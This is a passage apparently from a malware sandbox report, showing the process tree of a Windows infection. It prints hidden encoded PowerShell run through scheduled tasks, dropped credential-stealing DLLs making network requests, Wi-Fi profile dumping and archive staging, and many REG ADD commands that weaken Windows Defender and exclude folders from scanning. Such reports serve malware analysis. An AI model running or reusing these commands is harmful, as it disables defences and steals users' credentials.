                                                      9⤵
                                                        PID:5720
                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                    schtasks /CREATE /TN "gLLwxWkdd" /SC once /ST 00:21:42 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                    7⤵
                                                    • Creates scheduled task(s)
                                                    PID:4312
                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                    schtasks /run /I /tn "gLLwxWkdd"
                                                    7⤵
                                                      PID:3512
                                                      • C:\Windows\System32\Conhost.exe
                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        8⤵
                                                          PID:2916
                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                        schtasks /DELETE /F /TN "gLLwxWkdd"
                                                        7⤵
                                                          PID:6096
                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                          schtasks /CREATE /TN "bNoYxGgNiGReyhFIfY" /SC once /ST 00:29:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\qeOxabDhDvCCKUygJ\MfJxEgkARsuSvOa\OKiehVV.exe\" Qp /ZHsite_idiXL 385118 /S" /V1 /F
                                                          7⤵
                                                          • Drops file in Windows directory
                                                          • Creates scheduled task(s)
                                                          PID:4492
                                                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
                                                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
                                                  3⤵
                                                    PID:1848
                                                • C:\Windows\SysWOW64\rundll32.exe
                                                  "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\cred64.dll, Main
                                                  2⤵
                                                  • Loads dropped DLL
                                                  PID:908
                                                  • C:\Windows\system32\rundll32.exe
                                                    "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\cred64.dll, Main
                                                    3⤵
                                                    • Blocklisted process makes network request
                                                    • Loads dropped DLL
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    PID:4300
                                                    • C:\Windows\system32\netsh.exe
                                                      netsh wlan show profiles
                                                      4⤵
                                                        PID:920
                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        powershell -Command Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\930051783255_Desktop.zip' -CompressionLevel Optimal
                                                        4⤵
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:964
                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                    "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main
                                                    2⤵
                                                    • Blocklisted process makes network request
                                                    • Loads dropped DLL
                                                    PID:5436
                                                • C:\Windows\SysWOW64\WerFault.exe
                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 788 -ip 788
                                                  1⤵
                                                    PID:1540
                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 4312 -ip 4312
                                                    1⤵
                                                      PID:1124
                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 788 -ip 788
                                                      1⤵
                                                        PID:3324
                                                      • C:\Windows\system32\svchost.exe
                                                        C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
                                                        1⤵
                                                          PID:4328
                                                        • C:\Windows\system32\svchost.exe
                                                          C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                          1⤵
                                                            PID:4956
                                                          • C:\Windows\system32\svchost.exe
                                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon
                                                            1⤵
                                                              PID:920
                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                              C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                              1⤵
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:6032
                                                              • C:\Windows\system32\gpupdate.exe
                                                                "C:\Windows\system32\gpupdate.exe" /force
                                                                2⤵
                                                                  PID:2652
                                                              • C:\Windows\system32\gpscript.exe
                                                                gpscript.exe /RefreshSystemParam
                                                                1⤵
                                                                  PID:4784
                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 4360 -ip 4360
                                                                  1⤵
                                                                    PID:5752
                                                                  • C:\Windows\windefender.exe
                                                                    C:\Windows\windefender.exe
                                                                    1⤵
                                                                    • Executes dropped EXE
                                                                    • Modifies data under HKEY_USERS
                                                                    PID:772
                                                                  • C:\Users\Admin\AppData\Local\Temp\qeOxabDhDvCCKUygJ\MfJxEgkARsuSvOa\OKiehVV.exe
                                                                    C:\Users\Admin\AppData\Local\Temp\qeOxabDhDvCCKUygJ\MfJxEgkARsuSvOa\OKiehVV.exe Qp /ZHsite_idiXL 385118 /S
                                                                    1⤵
                                                                    • Executes dropped EXE
                                                                    • Drops file in System32 directory
                                                                    PID:2420
                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
                                                                      2⤵
                                                                      • Drops file in System32 directory
                                                                      • Modifies data under HKEY_USERS
                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                      PID:5788
                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                        "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                                                                        3⤵
                                                                          PID:3296
                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                            REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                                                                            4⤵
                                                                              PID:2088
                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
                                                                            3⤵
                                                                              PID:2520
                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
                                                                              3⤵
                                                                                PID:4076
                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
                                                                                3⤵
                                                                                  PID:5248
                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
                                                                                  3⤵
                                                                                    PID:1844
                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
                                                                                    3⤵
                                                                                      PID:3864
                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
                                                                                      3⤵
                                                                                        PID:2872
                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
                                                                                        3⤵
                                                                                          PID:4908
                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
                                                                                          3⤵
                                                                                            PID:5008
                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
                                                                                            3⤵
                                                                                              PID:5488
                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
                                                                                              3⤵
                                                                                                PID:5752
                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
                                                                                                3⤵
                                                                                                  PID:5528
                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
                                                                                                  3⤵
                                                                                                    PID:2944
                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
                                                                                                    3⤵
                                                                                                      PID:6068
                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
                                                                                                      3⤵
                                                                                                        PID:5964
                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
                                                                                                        3⤵
                                                                                                          PID:5960
                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
                                                                                                          3⤵
                                                                                                            PID:6076
                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
                                                                                                            3⤵
                                                                                                              PID:4744
                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
                                                                                                              3⤵
                                                                                                                PID:3896
                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
                                                                                                                3⤵
                                                                                                                  PID:2132
                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
                                                                                                                  3⤵
                                                                                                                    PID:1596
                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
                                                                                                                    3⤵
                                                                                                                      PID:3264
                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
                                                                                                                      3⤵
                                                                                                                        PID:5336
                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
                                                                                                                        3⤵
                                                                                                                          PID:3204
                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
                                                                                                                          3⤵
                                                                                                                            PID:4244
                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
                                                                                                                            3⤵
                                                                                                                              PID:3332
                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
                                                                                                                              3⤵
                                                                                                                                PID:5548
                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
                                                                                                                                3⤵
                                                                                                                                  PID:4692
                                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DyYwGMOhU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DyYwGMOhU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\NEwrPvSGentU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\NEwrPvSGentU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\iRMzUYCAhkbMC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\iRMzUYCAhkbMC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\oZARwjxMcMUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\oZARwjxMcMUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\wqRDBEtPSAXhoJHUBaR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\wqRDBEtPSAXhoJHUBaR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\nFdGJOiAxzTYZTVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\nFdGJOiAxzTYZTVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\qeOxabDhDvCCKUygJ\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\qeOxabDhDvCCKUygJ\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\AZgKexhzWxKGMSOL\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\AZgKexhzWxKGMSOL\" /t REG_DWORD /d 0 /reg:64;"
                                                                                                                                2⤵
                                                                                                                                • Drops file in System32 directory
                                                                                                                                • Modifies data under HKEY_USERS
                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                PID:5284
                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                  "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DyYwGMOhU" /t REG_DWORD /d 0 /reg:32
                                                                                                                                  3⤵
                                                                                                                                    PID:6096
                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DyYwGMOhU" /t REG_DWORD /d 0 /reg:32
                                                                                                                                      4⤵
                                                                                                                                        PID:6132
                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DyYwGMOhU" /t REG_DWORD /d 0 /reg:64
                                                                                                                                      3⤵
                                                                                                                                        PID:2668
                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NEwrPvSGentU2" /t REG_DWORD /d 0 /reg:32
                                                                                                                                        3⤵
                                                                                                                                          PID:4876
                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NEwrPvSGentU2" /t REG_DWORD /d 0 /reg:64
                                                                                                                                          3⤵
                                                                                                                                            PID:2928
                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\iRMzUYCAhkbMC" /t REG_DWORD /d 0 /reg:32
                                                                                                                                            3⤵
                                                                                                                                              PID:5776
                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\iRMzUYCAhkbMC" /t REG_DWORD /d 0 /reg:64
                                                                                                                                              3⤵
                                                                                                                                                PID:5464
                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oZARwjxMcMUn" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                3⤵
                                                                                                                                                  PID:5224
                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oZARwjxMcMUn" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                  3⤵
                                                                                                                                                    PID:5536
                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\wqRDBEtPSAXhoJHUBaR" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                    3⤵
                                                                                                                                                      PID:2096
                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\wqRDBEtPSAXhoJHUBaR" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                      3⤵
                                                                                                                                                        PID:4820
                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\nFdGJOiAxzTYZTVB /t REG_DWORD /d 0 /reg:32
                                                                                                                                                        3⤵
                                                                                                                                                          PID:6128
                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\nFdGJOiAxzTYZTVB /t REG_DWORD /d 0 /reg:64
                                                                                                                                                          3⤵
                                                                                                                                                            PID:5204
                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                            3⤵
                                                                                                                                                              PID:4964
                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                              3⤵
                                                                                                                                                                PID:1444
                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
